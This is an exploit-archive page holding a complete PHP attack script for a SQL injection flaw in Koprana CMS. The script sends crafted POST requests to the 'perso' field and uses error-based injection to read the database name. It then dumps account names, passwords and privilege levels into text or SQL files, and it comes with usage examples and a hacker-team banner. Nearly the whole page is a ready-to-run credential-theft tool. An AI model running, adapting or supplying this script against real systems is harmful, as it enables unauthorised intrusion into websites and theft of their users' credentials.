Home / exploits Koprana CMS SQL Injection
Posted on 11 April 2012
<?php //NOTE : - If you are using BHR put this file in exploitswebapp folder // - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only) /* load exploits/webapp/omiworld_injection.php set HOST target set MODE (1 for admin accounts/2 for all accounts) set FILE (save format TXT/SQL) exploit !Koprana_Injection @ HOST = localhost = Target URL @ PORT = 80 = Target Port @ PATH = / = Web site path @ MODE = 1 = Injection mode @ FILE = sql = Save type */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host,$port, $packet) { if (!($sock = fsockopen($host, $port))) die(" [-] No response from {$host}:{$port} "); fputs($sock, $packet); return stream_get_contents($sock); } function write_txt($host, $file, $account, $pass, $level) { $save_file = fopen("".$file."", "a+"); fwrite($save_file, "$account:$pass:$level "); fclose($save_file); } function write_sql($file, $account, $pass, $level) { $save_file = fopen("".$file."", "a+"); fwrite($save_file, "INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level') "); fclose($save_file); } function write($host, $file) { $save_file = fopen("".$file."", "a+"); if($file == "accounts.sql") fwrite($save_file, "/* Accounts of $host */ "); else fwrite($save_file, "=========== Accounts of $host =========== "); fclose($save_file); } function fetch_data($page) { $debut = "~'"; $debutTxt = strpos( $page, $debut ) + strlen( $debut ); $fin = "'~1"; $finTxt = strpos( $page, $fin ); $data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt ); return $data_fetch; } function PostIt($host,$port,$path,$payload){ $packet = "POST {$path}index.php?pages=vip_ontrue HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Connection: keep-alive {$payload}"; return http_send($host,$port, $packet); } print " +-----------------------[ The Crazy3D Team ]--------------------------+"; print " | Koprana CMS SQL Injection Exploit |"; print " | by The UnKn0wN |"; print " | Greets to : The Crazy3D's members and all Algerian h4x0rs |"; print " +---------------------------------------------------------------------+"; print " | www.Dofus-Exploit.com | WwW.IzzI-Hack.com |"; print " +---------------------------------------------------------------------+ "; if ($argc < 5) { print " Usage......: php $argv[0] <host> <port> <path> <mode> <save> "; print " Example....: php $argv[0] localhost 80 / 1 txt "; print " Example....: php $argv[0] localhost 80 /site/ 3 sql "; die(); } $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $file = $argv[5]; if($file == "txt") $file = "accounts.txt"; else $file = "accounts.sql"; $inj_test = "or '1'='1"; $inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_test.""; if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable "); else print ("[+] CMS can be exploited! "); $payload = "send=Envoyer&perso=test".$inj_db.""; $db = fetch_data(PostIt($host,$port,$path,$payload)); if(empty($db)) die("[-] Can't find the database! "); print "[+] Database: ".$db." "; switch ($mode) { case 1: $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Admin accounts: ".$num." "; for($i=0; $i<$num; $i++) { $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account} Pass: {$pass} Level: {$level} "; if($file == "accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; case 2: $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Accounts: ".$num." "; for($i=0; $i<$num; $i++) { $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account} Pass: {$pass} Level: {$level} "; if($file == "accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; }
